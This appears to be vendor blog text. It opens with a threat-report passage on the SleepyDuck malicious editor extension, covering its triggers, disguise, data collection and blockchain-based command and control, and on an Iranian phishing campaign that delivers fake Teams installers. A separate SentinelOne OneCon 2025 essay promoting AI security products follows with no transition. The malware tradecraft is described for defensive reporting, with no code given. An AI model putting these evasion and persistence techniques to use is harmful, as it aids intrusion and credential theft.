Security researchers report that SleepyDuck activates when the code editor starts, a Solidity file opens, or when a compile command runs. It disguises its malicious activity through a fake webpack.init() function from extension.js, while secretly executing payloads that collect system information such as hostnames, usernames, MAC addresses, and timezones.

After it is triggered, the trojan queries the Ethereum blockchain to find the fastest RPC provider, read its C2 details, and enter a polling loop for new instructions. This blockchain-based C2 redundancy means that even if the main C2 domain (sleepyduck[.]xyz) is disabled, the malware can still fetch updated addresses or commands from the blockchain, making takedown efforts much more difficult.

In response, Open VSX has introduced new security measures, including shorter token lifetimes, automated scans, revoking any leaked credentials, and working in coordination with VS Code to block emerging threats. Best practices for developers include verifying extension publishers and installing software only from trusted repositories to avoid supply-chain compromises.

The Ugly | Iran-Based Actors Target U.S. Policy Experts in New Espionage Campaign

Between June and August, a newly identified threat cluster dubbed ‘UNK_SmudgedSerpent’ launched a series of targeted cyberattacks against U.S.-based academics and foreign policy experts focused on the Middle East. The campaign, coinciding with rising Iran-Israel tensions, uses politically-themed lures related to Iranian domestic affairs and the militarization of the Islamic Revolutionary Guard Corps (IRGC).

Researchers say the threat actors behind the campaign initiated attacks with benign email exchanges before introducing phishing links impersonating prominent U.S. foreign policy figures and think tank institutions like the Brookings Institution and Washington Institute.

The targeted victims, over 20 U.S.-based experts on Iran-related policy, were enticed to open malicious meeting documents and login pages designed to harvest their Microsoft account credentials. In some attacks, the attackers sent URLs leading to fake MS Teams login pages but pivoted to spoofed OnlyOffice sites if the victim grew suspicious.

Clicking the links led to the download of malicious MSI installers disguised as Microsoft Teams, which then deployed legitimate remote monitoring and management (RMM) software like PDQ Connect. Subsequent activity suggests attackers manually installed additional tools such as ISL Online, indicating possible hands-on-keyboard intrusion.

Researchers note that the operation’s tactics mirror those of known Iranian cyberespionage groups such as TA455 (aka UNC1549, Smoke Sandstorm), TA453 (aka TunnelVision, APT 35, UNC788), and TA450 (aka TEMP.Zagros).

The researchers believe UNK_SmudgedSerpent’s campaigns are part of a broader collection effort by Iranian intelligence aimed at gathering insights from Western experts on regional policy, academic analyses, and strategic technologies.

Every major technology revolution begins the same way: Promise, panic, and potential.

The internet gave us connection. Cloud gave us scale. AI is giving us cognition – systems that can reason, decide, and act.

Firewalls helped the internet era. Workload protection helped the cloud era. And, in the AI era, you have AI Security.

This is a new field and frontier that requires mastering two disciplines at once.

• Security for AI – Governing and protecting the usage of AI itself. Models, data, agents, and the users and developers who rely on them. In many cases, this is also done by AI.
• AI for Security – Applying agentic AI and machine learning to solve today’s biggest cybersecurity challenge: Staying ahead of AI-powered attacks by detecting, investigating, and responding at machine speed.

Most importantly, in this era, the architecture and infrastructure needed to truly benefit from AI will be the determining factor to successfully secure it. Quality of data, inclusivity of data, cardinality, and latency will be critical, as will be the tools and technologies facilitating those.

At OneCon 2025, we are laying out a practical path to secure this new world. The opportunities AI creates, the risks it introduces. The strategy and product innovation you can put to work today to accelerate and de-risk your AI journey.

AI: Business Accelerant & New Attack Surface

The need for these dual disciplines is driven by the rapid increase in AI usage itself – both by good and bad forces.

AI is accelerating everything. It is transforming how businesses operate, how employees work, and how attackers adapt. Across every single industry, AI is becoming embedded into processes, tools and workflows in every team. Marketing teams use it to generate content. Developers use it to write code. Legal, HR and finance all use it to summarize and automate tasks. AI is now woven into the very fabric of how organizations think and operate.

While holding incredible potential benefits, this transformation is also introducing massive new security risks. Traditional security controls are blind to the data that employees are entering into 3rd-party AI models. Security teams lack visibility into the growing ecosystem of AI tools and assistants spreading across every single enterprise. AI-based browsers that integrate chat or summarization features create new pathways for data exposure. And the rise of Model Context Protocol (MCP) servers that connect agents to agents introduces an entirely new layer of risk that most organizations are not equipped to monitor or govern today.

Meanwhile, adversaries are evolving just as quickly. They are using AI to increase efficiency, precision, and their reach. Non-native English speakers can now craft a convincing, localized spearphishing campaign in minutes. LLMs are being used to write polymorphic malware that mutates faster than traditional defenses can react. Attackers are automating their reconnaissance, identifying vulnerabilities through natural language interfaces, and even embedding AI models directly inside malware to adapt in real time.

The result is a security gap that spans both sides of the equation – on one side, AI as a catalyst for real business innovation and, on the other, AI as an enabler of attack and massive risk exposure.

Building Security in the Age of AI: Three Critical Principles

Protecting this new world requires visibility, intelligent automation, and governance that can move at the same speed as AI itself. In solving for that, we believe in a simple yet critical guiding philosophy to delivering effective AI Security – three critical principles that inform everything that we build and anchor any platform-level defense.

1. Intelligence Over Rules – Security must think, not react. Static signatures and brittle logic can’t match the velocity of modern threats. True protection emerges when AI continuously learns, reasons, and adapts — detecting intent, not just pattern.
2. Autonomy with Accountability – Machines should act at machine speed, but always within human-defined guardrails and system supervision. The future of defense is autonomous, but never ungoverned where AI decisions remain explainable, traceable, and aligned with human values.
3. Unity of Data, Context, and Action – Effective AI security fuses signals from endpoints, identities, and clouds into one coherent understanding. Insight without context is noise; action without context is chaos. The synthesis of both creates real-time, end-to-end resilience.

These principles map directly to the questions customers ask us every day.

How do I better defend my organization?

How do I outpace threats?

How do I get the most from my people and partners?

SentinelOne’s AI Advantage

When it comes to making AI Security real today, SentinelOne is in a unique position. We have been AI-native since day one. Automation has been foundational from the start, not a bolt-on. And, we’ve been using agentic approaches and workflows in live security environments before it became the buzzword du jour.

At launch, we were among the first to apply machine learning to malware detection and prevention. That broke the decades-old pattern of pushing static signatures to endpoints many times a day. Instead of distributing new rules after every outbreak, we trained lightweight predictive models that identified malicious behavior on their own. That meant detecting never-before-seen threats in real time at massive scale.

That innovation reshaped endpoint security and set the foundation for what followed. The same principles of data-driven models, autonomous decision making, and behavioral analytics evolved into the Singularity Platform and now power Purple AI, our agentic system that changes how analysts detect, investigate, and respond. Together, they extend protection and intelligence across endpoint, identity, cloud, and AI. It is an entire platform built on and enhanced by AI. This is how we keep our customers safe: By delivering real time security that is predictive and adaptive, at planet scale.

This year we took the next step with two focused acquisitions:

• Prompt Security – A portfolio built to secure AI use cases and protect how employees, developers, and applications leverage generative and agentic AI. This is a critical component of protecting AI as an attack surface itself.
• Observo AI – An AI-ready streaming data pipeline that intelligently filters, normalizes, and ingests petabytes of telemetry across the enterprise with sub-second latency and strong cost efficiency. Combined with Singularity AI SIEM, this provides both pre-ingestion analytics and flexible pull/stream data collection, ensuring complete visibility, real-time detections and autonomous response across the entire security environment.

These advancements extend Singularity into a unified AI Security architecture that gives defenders a complete, autonomous view across traditional and emerging surfaces – from premise to cloud.

Delivering on the AI Security Vision Today

Today at OneCon, we’re not just giving customers a roadmap and strategy, we’re giving them new tools and innovation to start securing their AI-enterprise today, including:

• New solutions from Prompt Security to secure AI apps, tools, developers and agents – Real-time visibility and policy enforcement across thousands of AI tools. Shadow AI discovery, data loss prevention for prompts and outputs, safe coding with secret redaction and vulnerable code blocking, and protection for internal AI applications.
• Purple AI innovations – Integrated agentic auto-investigations with dynamic runbooks. Next best actions on alerts. One-click custom detection rule creation that turns investigation outcomes into durable detections. Integration with Singularity Hyperautomation for approved response.
• Purple AI MCP Server – A secure bridge between Singularity’s live intelligence and your AI ecosystem. Build your own agents grounded in your security context. Use OpenAI, Anthropic, Gemini, or internal models. Innovate securely at scale. The MCP Server is open source and available on GitHub today.
• Observo AI pipelines and integration with Singularity AI-SIEM – Vendor-agnostic data engine for any source to any destination. When paired with Singularity AI SIEM, Observo supercharges detection and response with high-fidelity, cost-efficient streaming telemetry.
• Wayfinder Threat Detection and Response with Google Threat Intelligence – Global insight combined with automation and human expertise. GTI visibility feeds directly into SentinelOne services. Intelligence becomes action through Purple and our analysts. Faster, more precise response as a matter of process, not hope.
• Platform upgrades:
  • Native scalability to million+ active agents in a single deployment. Faster policy updates with minute command SLA.
  • Agent efficiency improvements across operating systems. Lower CPU and memory usage, fewer support cases, better user experience.
  • AI SIEM query engine overhaul that supports very high cardinality and keeps up to seven years of security data hot. Natural language search in Purple AI operates on the same high performance data. No cold storage delays.
  • Live Security Updates upgrades that dramatically reduce response times, and improve accuracy and efficacy.  And more customer controls for safe rollout.
  • Thousands of new detections continually delivered, from the AI-SIEM to the endpoint agent. We’re wherever the adversary moves, delivering real-time protection across dozens of surfaces and data sources. With AI infused into every layer of our operations, we’re moving faster, scaling further, and stopping even unknown threats with greater precision than ever before.
  • New Infrastructure as Code (IaC) deployment processes, better observability across the platform, and proactive communications on incidents via a public status page have all been added to bolster resilience, reliability and transparency.
  • Active monitoring mode and proactive alerting extends resilience outside the SaaS operation into the Endpoint agent, providing near real-time health metrics of the agents themselves – now transparently available for the customer visibility in the agent management control plane.

The Path Forward in AI Security: Advancing Humanity, Protecting the Human

AI security is more than just defending systems, it’s about defending the fabric of trust that lets humans thrive in a digital world. As intelligence becomes ambient and autonomous, security must evolve from a reactive layer into an enabling force for human progress.

• Empowering Human Potential – By offloading complexity and noise to intelligent machines, AI security frees humans to focus on creativity, empathy, and purpose. Protection becomes invisible, a silent force amplifying human capability rather than constraining it.
• Preserving Digital Integrity – As data becomes identity, securing truth is a moral imperative. AI security safeguards the authenticity of information, ensuring societies can rely on what they see, share, and believe. As our lives move fully into digital spaces, the boundary between human and machine expression blurs. Every action carries traces of who we are. In this new reality, AI Security’s role is to safeguard that trust: To ensure that what we see, share, and decide upon is authentic. It means protecting the fidelity of data, the truth of identities, and the integrity of digital interactions against manipulation. It is the contract to our reality.
• Building Ethical Autonomy – The next era demands systems that defend not only themselves, but the people they serve. Ethical AI security means designing intelligence that understands context, respects privacy, and acts in humanity’s best interest even when no one is watching.

Ultimately, the path forward fuses human and artificial intelligence into a shared defense, machines protecting people, and people guiding machines, so that technology remains our most trusted ally, not our greatest risk.

Defenders deserve a technology that protects every surface, that can see everything, turns data into advantage, and puts human governance at the center. So, let’s get started.

AI for Security. Security for AI. Autonomous protection, always evolving, in production, today, all in pursuit of a safer, brighter future.